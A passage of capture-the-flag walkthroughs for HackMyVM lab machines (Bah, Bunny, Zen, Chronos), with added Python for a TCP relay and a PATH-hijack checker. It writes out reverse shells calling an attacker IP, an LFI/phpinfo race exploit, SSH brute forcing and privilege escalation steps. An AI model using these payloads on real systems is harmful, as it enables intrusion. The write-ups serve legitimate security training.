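"""Added example: stdlib-only TCP relay standing in for the socat one-liner above."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy src -> dst until src hits EOF, then half-close dst so the far side sees EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client: socket.socket, target) -> None:
    """Bridge one accepted client to a fresh connection to target, both directions at once."""
    try:
        upstream = socket.create_connection(target, timeout=10)
    except OSError:
        client.close()
        return
    upstream.settimeout(None)
    up = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
    up.start()
    _pump(upstream, client)
    up.join()
    client.close()
    upstream.close()


class Forwarder:
    """Listen on `listen` (host, port) and relay every connection to `target` (host, port)."""

    def __init__(self, listen, target):
        self.target = target
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(listen)
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]   # real port, useful when listen used port 0

    def start(self) -> int:
        threading.Thread(target=self._accept_loop, daemon=True).start()
        return self.port

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:        # listening socket closed by stop()
                return
            threading.Thread(target=_relay, args=(client, self.target), daemon=True).start()

    def stop(self) -> None:
        self.sock.close()


def echo_server() -> int:
    """Constructed stand-in for the loopback-only sshd: echoes one connection back, returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            _pump(conn, conn)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def roundtrip(message: bytes) -> bytes:
    """Push message through a relay into the echo server and return what comes back."""
    fwd = Forwarder(("127.0.0.1", 0), ("127.0.0.1", echo_server()))
    port = fwd.start()
    received = b""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(message)
        c.shutdown(socket.SHUT_WR)          # we are done sending; wait for the echo and EOF
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            received += chunk
    fwd.stop()
    return received


if __name__ == "__main__":
    # On the box the equivalent of the socat line is:
    #   Forwarder(("0.0.0.0", 5000), ("127.0.0.1", 21)).start()   then ssh -p 5000 from the attacker
    print(roundtrip(b"SSH-2.0-probe\r\n"))
```

The half-close in _pump is the part people usually get wrong: without shutdown(SHUT_WR) on the peer when one side hits EOF, an SSH session through the relay hangs on logout instead of closing cleanly.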

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log  
 ...
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: qdPM | Login
 3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
 ...

Port 80 shows a qdPM 9.2 login panel. A search shows that this version leaks its database credentials without authentication:

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
 # Date: 03/08/2021
 # Exploit Author: Leon Trappett (thepcn3rd)
 # Vendor Homepage: https://qdpm.net/
 # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
 # Version: 9.2
 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Download databases.yml, get login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"
```

Log in to MySQL on 3306 with those credentials. One table holds a URL list:

 ```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
 ...
 +----+-------------------------+
 | id | url                     |
 +----+-------------------------+
 |  1 | http://portal.bah.hmv   |
 |  2 | http://imagine.bah.hmv  |
 |  3 | http://ssh.bah.hmv      |
 |  4 | http://dev.bah.hmv      |
 |  5 | http://party.bah.hmv    |
 |  6 | http://ass.bah.hmv      |
 |  7 | http://here.bah.hmv     |
 |  8 | http://hackme.bah.hmv   |
 |  9 | http://telnet.bah.hmv   |
 | 10 | http://console.bah.hmv  |
 | 11 | http://tmux.bah.hmv     |
 | 12 | http://dark.bah.hmv     |
 | 13 | http://terminal.bah.hmv |
 +----+-------------------------+
 13 rows in set (0.001 sec)
```

And a users list.

 MariaDB [hidden]> select * from users;
 +----+---------+---------------------+
 | id | user    | password            |
 +----+---------+---------------------+
 |  1 | jwick   | Ihaveafuckingpencil |
 |  2 | rocio   | Ihaveaflower        |
 |  3 | luna    | Ihavealover         |
 |  4 | ellie   | Ihaveapassword      |
 |  5 | camila  | Ihaveacar           |
 |  6 | mia     | IhaveNOTHING        |
 |  7 | noa     | Ihaveflow           |
 |  8 | nova    | Ihavevodka          |
 |  9 | violeta | Ihaveroot           |
 +----+---------+---------------------+
 9 rows in set (0.001 sec)

Build a wordlist from the URL list and enumerate vhosts. Every name answers 200 because nginx serves a default page for unknown hosts (their sizes differ only by the length of the hostname echoed back into the page), but party.bah.hmv returns a clearly different size, so it is a real vhost.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]

Add party.bah.hmv to /etc/hosts and open it in a browser: it is a shellinabox web terminal. Log in with the credentials from the yml file (qpmadmin / qpmpazzw).

image-20210822104716708.png

This web terminal is a full interactive shell, so there is no need to spawn a reverse shell.

/home has another user, rocio; switch to her with the password from the users table (Ihaveaflower).

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Run pspy. The shellinaboxd command line is interesting:

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Bl
 ack on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disa
 ble-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

shellinabox's -s/--service option takes URL:USER:GROUP:CWD:CMD, so /devel:root:root:/:/tmp/dev means that visiting /devel runs /tmp/dev as root:root with / as the working directory. Anyone can create /tmp/dev.

So drop a reverse shell into /tmp/dev and make it executable:

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

Visiting http://party.bah.hmv/devel/ in the browser runs it, and the listener gets a root shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                      
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan dirs.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]
```

Nothing interesting in those files. Next, fuzz index.php for a parameter that includes files:

```bash
 ~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013357:   200        31 L     43 W       1508 Ch     "page"
```

Fuzz for local files through it; plenty are readable, but nothing directly useful turns up:

~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ'  --hh 25  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt                  
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...

Now there is a PHP LFI plus an exposed phpinfo.php with file_uploads = On. That is the classic LFI + phpinfo() race: every upload lands in a temporary file whose name phpinfo() prints, and including that file before PHP deletes it executes our code.

Download the PoC from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and change its PAYLOAD so the temporary file drops a PHP shell in /tmp/g:

```python
PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG
```

Run the PoC; it wins the race after a few dozen attempts and the payload writes the shell to /tmp/g.

```bash
~ (p2) python exp.py 192.168.56.100 80
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g

Woot! \m/
Shuttin' down...
```

Start a listener on 1234 and include /tmp/g through the LFI:

 ```bash
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'                                                    
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49970.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

sudo -l as www-data shows a wrapper script in chris's home called magic:

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$

GTFOBins' zip entry uses exactly the -T -TT 'sh #' arguments that magic appends, so passing zip as the first argument spawns a shell as chris:

 Shell

 It can be used to break out from restricted environments by spawning an interactive system shell.

     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF

Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Create /home/chris/.ssh, put our public key in authorized_keys (chmod 600), and log in over SSH as chris.

Look for files we can write to: a Python standard-library module stands out.

```bash
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...
```

/opt/pendu.py imports random, which resolves to that writable /usr/lib/python3.7/random.py.

 ```bash
chris@bunny:~$ cd /opt
 chris@bunny:/opt$ ls -la
 total 12
 drwxr-x---  2 root chris 4096 Jul 31 10:25 .
 drwxr-xr-x 18 root root  4096 Jul 31 09:00 ..
 -rw-r--r--  1 root root  1993 Jul 31 10:14 pendu.py
 chris@bunny:/opt$ cat pendu.py
 import random
 ...
```

pspy shows root's cron running it:

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py

Write a Python reverse shell into random.py (it executes at import time) and wait for the next run:

```bash
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: cannot set terminal process group (1259): Inappropriate ioctl for device
bash: no job control in this shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groups=0(root)
bunny
root@bunny:~#
```

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100  
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    

The HTML comment at the bottom of the main page gives the app name and version.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->
```

Searching for Zenphoto 1.5.7 turns up an authenticated arbitrary file upload (advisory quoted below):

 Authenticated arbitrary file upload to RCE

 Product : Zenphoto
 Affected : Zenphoto CMS - <= 1.5.7
 Attack Type : Remote

 Login, then go to plugins, then go to uploader and tick the elFinder check box,
 then press apply. After that go to upload, then Files(elFinder), drag and drop
 any malicious php code, then go to /uploaded/ and there is your php code.

 Zenphoto through 1.5.7 is affected by authenticated arbitrary file
 upload, leading to remote code execution. The attacker must navigate to
 the uploader plugin, check the elFinder box, and then drag and drop
 files into the Files(elFinder) portion of the UI. This can, for
 example, place a .php file in the server's uploaded/ directory.

 [Reference]
 https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
 https://twitter.com/3almisfer
 https://github.com/azizalshammari/

robots.txt also contains a strange entry: P@ssw0rd.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Upload a php shell and get reverse shell.

```bash
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ curl http://192.168.56.99/backup/r.php
```

Found 3 users in home folder.

www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

No path leads from www-data to any of these three users, so fall back to brute-forcing SSH with the usernames as the wordlist (-e nsr also tries an empty password, the login name and the reversed login name):

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

```bash
zenmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p
```

As kodo, sudo -l allows /usr/bin/see as hua. Its edit action opens the file in an editor, and from there a shell escape (:!/bin/bash in vim) gives a shell as hua.

 ```bash
kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)
```

Check sudo -l.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
```

find shows that /usr/local/bin is writable by hua, and it is the second entry in sudo's secure_path, ahead of /usr/bin and /bin.

 ```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...
```

strace shows add-shell (a shell script) probing /usr/local/bin for awk, cat and rm before finding them further down the PATH; none of those exist there yet.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory
```

So a script named awk in /usr/local/bin wins the lookup. Put a reverse shell there, run add-shell under sudo, and the listener gets root:

```bash
 hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen
```
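The strace check above, as an added example (my code, not the author's and not part of the original page): parse the probe lines, keep the ENOENT misses that fall inside sudo's secure_path, and report the ones in directories we can write. The strace excerpt is constructed to mirror the output above rather than a real capture, and the set of writable directories is passed in explicitly so the run does not depend on the local filesystem.

```python
"""Added example: find PATH probes a sudo target makes through a directory we can write."""
import os
import re

# secure_path from the sudo -l output above
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed strace excerpt modelled on the output above; not a real capture.
SAMPLE_STRACE = """\
execve("/usr/sbin/add-shell", ["/usr/sbin/add-shell", "zen"], 0x7ffd3c1e2a10 /* 12 vars */) = 0
stat("/usr/local/sbin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/bin/awk", {st_mode=S_IFREG|0755, st_size=658072, ...}) = 0
stat("/usr/local/sbin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/bin/cat", {st_mode=S_IFREG|0755, st_size=43744, ...}) = 0
stat("/usr/local/sbin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
stat("/usr/bin/rm", {st_mode=S_IFREG|0755, st_size=72056, ...}) = 0
"""

# A failed existence probe: stat/lstat/access or newfstatat(AT_FDCWD, ...) returning ENOENT
MISS_RE = re.compile(r'^(?:stat|lstat|access|newfstatat)\((?:AT_FDCWD, )?"([^"]+)".*= -1 ENOENT')


def missed_lookups(strace_text: str, secure_path: str) -> list:
    """(command, directory) for every probe that missed inside a secure_path directory.

    The shell walks PATH left to right and stops at the first hit, so every miss for a
    name is in a directory searched before the real binary."""
    dirs = set(secure_path.split(":"))
    misses = []
    for line in strace_text.splitlines():
        m = MISS_RE.match(line)
        if not m:
            continue
        directory, name = os.path.split(m.group(1))
        if directory in dirs:
            misses.append((name, directory))
    return misses


def hijackable(strace_text: str, secure_path: str, writable=None) -> list:
    """Misses in directories we can write: a script with that name there wins the lookup.

    writable: set of directories to treat as writable; None means ask the live filesystem."""
    if writable is None:
        writable = {d for d in secure_path.split(":") if os.access(d, os.W_OK)}
    return sorted({(name, d) for name, d in missed_lookups(strace_text, secure_path) if d in writable})


if __name__ == "__main__":
    # Live use on the box (strace cannot follow sudo itself, so trace the script as the unprivileged
    # user with PATH set to secure_path): PATH=$secure_path strace -o probes.log /usr/sbin/add-shell zen
    # then read probes.log and call hijackable(text, SECURE_PATH) with writable=None.
    for name, directory in hijackable(SAMPLE_STRACE, SECURE_PATH, writable={"/usr/local/bin"}):
        print(f"{directory}/{name}: consulted before the real {name} and writable")
```

The same check is the defender's view of the problem: a sudo rule for a script that calls unqualified commands is only as safe as every directory in secure_path that precedes the real bin directories.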

HackMyVm Chronos Walkthrough

The author's own writeup is here: https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author uses perl for the reverse shell because the machine filters many keywords (nc, bash, python, etc.).

My way is to use wget to fetch a PHP reverse shell instead.

~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong

 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php